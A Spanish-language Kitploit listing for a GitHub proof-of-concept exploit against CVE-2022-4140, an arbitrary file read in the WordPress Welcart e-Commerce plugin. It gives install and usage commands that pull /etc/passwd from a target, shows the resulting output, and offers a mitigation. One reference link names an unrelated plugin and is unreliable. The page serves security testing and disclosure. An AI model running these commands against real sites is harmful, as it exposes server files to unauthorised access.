Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-4140 — WordPress plugin Welcart e-Commerce < 2.8.5 - Lectura arbitraria de archivos | Kitploit
Herramientas/GitHubGitHub/anirbala98/cve-2022-4140
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubanirbala98/cve-2022-4140

CVE-2022-4140

WordPress plugin Welcart e-Commerce < 2.8.5 - Lectura arbitraria de archivos

Ver Repositorio
hace 22h 59mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-4140 - Plugin de WordPress Welcart e-Commerce < 2.8.5 - Lectura arbitraria de archivos

Este repositorio contiene un exploit de Prueba de Concepto (PoC) para CVE-2022-4140.

Aviso legal

Este proyecto se proporciona únicamente con fines educativos y para pruebas de seguridad autorizadas. No lo utilice contra sistemas que no sean de su propiedad o para los que no tenga permiso de prueba.

Descripción general

El plugin no valida la entrada del usuario antes de usarla para mostrar el contenido de un archivo, lo que podría permitir a un atacante no autenticado leer archivos arbitrarios en el servidor.

Versión afectada

ComponenteVersión
Plugin vulnerable<=2.8.4
Plugin parcheado2.8.5

Requisitos

  • Python 3.13.14
  • Requests 2.32.5

Instalación

root@kitploit:~
git clone https://github.com/anirbala98/CVE-2022-4140.git
cd CVE-2022-4140/
pip install -r requirements.txt

Uso

root@kitploit:~
python exploit.py <base_url> -f <ubicación del archivo> --disable-version-check
python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd

Ejemplo

root@kitploit:~
└─$ python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd                             
[*] Checking if target is vulnerable
[+] Plugin version detected: 2.8.4
[+] The target is vulnerable

[*] Attempting to read arbitrary file

root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

Mitigación

Actualice el plugin a la versión 2.8.5.

Referencias

  • https://nvd.nist.gov/vuln/detail/CVE-2022-4140
  • https://wpscan.com/vulnerability/0d649a7e-3334-48f7-abca-fff0856e12c7/
  • https://plugins.svn.wordpress.org/planyo-online-reservation-system/tags/2.9/
Descargar herramienta